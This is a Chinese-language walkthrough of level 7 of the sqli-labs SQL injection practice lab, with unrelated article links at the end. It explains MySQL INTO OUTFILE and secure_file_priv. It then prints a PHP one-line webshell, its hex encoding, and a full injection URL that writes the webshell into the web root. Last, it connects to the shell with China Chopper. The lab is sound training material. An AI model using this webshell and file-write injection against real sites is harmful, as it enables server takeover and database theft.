SQL注入漏洞解析--less-7

我们先看一下第七关

页面显示use outfile意思是利用文件上传来做

outfile是将检索到的数据,保存到服务器的文件内:

格式:select * into outfile "文件地址"

示例:

mysql> select * into outfile 'f:/mysql/test/one' from teacher_class;

secure_file_priv参数用于限制LOAD DATA, SELECT ...OUTFILE,

LOAD_FILE()传到哪个指定目录。secure_file_priv 为 'NULL' 时,表示限制mysqld不允许导入或导出。

secure_file_priv 为 '/tmp' 时,表示限制mysqld只能在/tmp目录中执行导入导出;

secure_file_priv '没有值'时,表示不限制mysqld在任意目录的导入导出

修改之后重启mysql,再查看一下,就是空值

当输入'时报错

通过url上传一句话木马,用webshell连接工具连接(这里我用的是中国菜刀)

1.123就是连接密码

php 复制代码
<?php @eval($_POST['123']);?>

2.3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e是上边一句话木马的hex编码,into outfile指定在七关目录(目录写自己的)下创建2.php文件,文件内容就是刚上传的一句话木马

  1. 登录mysql查询secure_file_priv是否为空
  2. show global variables like 'secure%'; #查询secure_file_priv
  3. 当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出
  4. 当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下
  5. 当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制
  6. http://127.0.0.1/sqli-labs-php7-master/Less-7/index.php?id=-1')) union select 1,0x3c3f70687020406576616c28245f504f53545b27313233275d293b3f3e,3 into outfile 'D:\phpstudy_x64_8.1.1.3\phpstudy_pro\WWW\sqli-labs-php7-master\Less-7\2.php'--+

3.用中国菜刀进行连接,测试连接成功

4.然后就可以访问数据库,从而获得信息

这道题其实出的挺鸡肋,你必须满足三个条件才能拿到他的数据库,第一就是必须拿到root权限;第二个就是 secure_file_priv这个必须不是NULL,这道题我这里是自己手动修改了,试想一下,如果你能修改权限了,还看不到里边的信息吗,或者你拿到root权限都不一定能修改的;第三个就是网站物理路径,这个想想办法还是有可能弄到。所以说这道题的条件还是很苛刻

相关推荐
AAA修煤气灶刘哥6 小时前
后端人速藏!数据库PD建模避坑指南
数据库·后端·mysql
RestCloud10 小时前
揭秘 CDC 技术:让数据库同步快人一步
数据库·api
得物技术13 小时前
MySQL单表为何别超2000万行?揭秘B+树与16KB页的生死博弈|得物技术
数据库·后端·mysql
可涵不会debug17 小时前
【IoTDB】时序数据库选型指南:工业大数据场景下的技术突围
数据库·时序数据库
ByteBlossom17 小时前
MySQL 面试场景题之如何处理 BLOB 和CLOB 数据类型?
数据库·mysql·面试
麦兜*17 小时前
MongoDB Atlas 云数据库实战:从零搭建全球多节点集群
java·数据库·spring boot·mongodb·spring·spring cloud
Slaughter信仰17 小时前
深入理解Java虚拟机:JVM高级特性与最佳实践(第3版)第十章知识点问答(10题)
java·jvm·数据库
麦兜*17 小时前
MongoDB 在物联网(IoT)中的应用:海量时序数据处理方案
java·数据库·spring boot·物联网·mongodb·spring